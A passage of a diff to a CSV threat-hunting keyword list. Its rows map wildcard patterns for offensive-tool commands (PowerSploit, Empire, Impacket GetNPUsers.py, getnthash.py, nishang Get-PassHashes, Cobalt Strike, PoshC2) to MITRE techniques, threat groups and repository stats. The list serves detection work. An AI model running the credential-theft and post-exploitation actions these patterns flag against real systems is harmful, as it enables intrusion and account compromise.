PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetLocalGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetLoggedon*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetRDPSession -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetRDPSession*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetUser -SPN*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getNimplantByGuid*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*GetNPUsers.py -request*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
-"*GetNPUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*GetNPUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*getnthash.py -key *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - 
T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*getnthash.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*Get-NTLM.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*GetNTLMChallengeBase64*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*getPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Get-PacketNetBIOSSessionService*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketNTLMSSPAuth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketNTLMSSPNegotiate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketRPCBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketRPCRequest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketSMB*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PassHashes*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Get-PassHints*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*get-passnotexp*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get-password-policy.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Get-PEBasicInfo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-PacketNetBIOSSessionService*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 